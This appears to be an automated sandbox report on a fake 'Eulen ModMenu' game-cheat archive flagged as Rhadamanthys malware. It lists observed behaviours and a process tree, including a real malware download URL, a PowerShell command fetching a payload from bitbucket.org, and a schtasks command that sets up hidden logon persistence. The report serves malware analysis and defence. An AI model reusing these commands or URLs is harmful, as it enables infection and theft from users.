Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1138363786823217202/1242262922730672198/Eulen_ModMenu.7z?ex=66547340&is=665321c0&hm=68de9a30b8aaa300125ba9c0a54306d06fb87f876346ed3b33a2a39d833fd477& was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Enumerates processes with tasklist
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Creates scheduled task(s)
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Delays execution with timeout.exe
Modifies registry class
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 19:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 19:40
Reported
2024-05-26 19:43
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4920 created 2340 | N/A | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe | C:\Windows\system32\sihost.exe |
| PID 5072 created 2340 | N/A | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{ED1076E9-58D1-491C-A1C7-C9990BD1E84D} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1138363786823217202/1242262922730672198/Eulen_ModMenu.7z?ex=66547340&is=665321c0&hm=68de9a30b8aaa300125ba9c0a54306d06fb87f876346ed3b33a2a39d833fd477&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3724 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=3744 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4244 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5572 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=5908 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6188 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\26eb46dee30342678ac1fc23a0581bec /t 5072 /p 3576
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2bc,0x7ff989062e98,0x7ff989062ea4,0x7ff989062eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2264 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2432 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2556 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3552 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3684 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4948 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4672 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=4976 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4020 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5476 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=3772 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6092 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6092 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6080 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6492 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Eulen_ModMenu.7z"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe
"C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=152 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6612 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6616 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe
"C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe"
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe
"C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FA78.tmp\FA79.tmp\FA7A.bat C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe"
C:\Windows\system32\chcp.com
chcp 1251
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/6dd364f2430bc8a2e90cb810c94663de171617ac/pan.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe
"C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe
"C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe"
C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe
"C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1831.tmp\1832.tmp\1833.bat C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe"
C:\Windows\system32\chcp.com
chcp 1251
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5820 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\system32\reg.exe
